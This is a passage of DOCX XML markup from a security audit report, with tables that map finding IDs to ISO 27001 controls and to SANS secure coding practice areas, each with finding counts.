            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-03, APP-07, APP-10, APP-12, APP-13, APP-14, CF-01, CF-02, CF-04, CF-05, CF-06, CF-07, CF-08, CF-13, CF-14, CF-15, CF-16, CF-17, CF-18, CI-01, CI-10, CI-11, CI-15, DEP-05, DET-02, DET-05, DET-12, DET-16, PB1-01, PB1-02, PB1-04, PB1-05, PB1-07, PB1-10, PB1-11, PB1-12, PB1-13, PB1-14, PB1-15, PB1-17, PB2-01, PB2-02, PB2-03, PB2-04, PB2-05, PB2-06, PB2-14, PB2-15, PB2-16, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.29 Security testing in development and acceptance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-14, DET-16, DET-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.31 Separation of development, test and production environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01, CI-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.8.32 Change management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-06, DEP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A.5.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.7 SANS Secure Coding Practices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Each finding is classified against the SANS/CERT Secure Coding Practices checklist area it most directly concerns. Areas with no finding are listed as met or not assessed in Section 9.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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3155"/>
        <w:gridCol w:w="4808"/>
        <w:gridCol w:w="677"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Practice area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-10, APP-13, CF-02, CF-05, CF-06, CF-07, CF-08, CF-15, CF-16, CI-01, CI-05, DET-06, DET-16, PB1-01, PB1-02, PB1-04, PB1-05, PB1-07, PB1-11, PB1-15, PB2-01, PB2-02, PB2-03, PB2-05, PB2-06, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Output Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-07, APP-12, CF-01, CI-10, DET-02, DET-05, DET-12, PB1-10, PB2-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication and Password Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-14, PB1-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Session Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CF-09, CF-10, CI-13, DET-03, DET-04, PB1-03, PB1-18, PB2-09, PB2-10, PB2-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cryptographic Practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Error Handling and Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12, CF-13, CF-14, CI-03, CI-09, PB1-09, PB1-12, PB1-16, PB2-08, PB2-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Data Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11, CI-12, SEC-03, SEC-04, SEC-05, SEC-09, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Communication Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, DET-13, PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>System Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, APP-05, APP-06, APP-09, APP-14, CI-02, CI-11, DEP-01, DEP-02, DEP-04, DEP-05, DEP-07, DEP-08, DEP-10, DEP-12, DET-07, DET-15, PB2-13, PB2-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Database Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04, CF-18, DEP-03, PB2-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Memory Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3155" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>General Coding Practices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4808" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-03, CF-17, CI-08, CI-15, CI-16, DEP-06, DEP-09, DET-08, DET-09, DET-14, DET-18, DET-19, PB1-08, PB1-13, PB1-14, PB1-17, SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="677" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
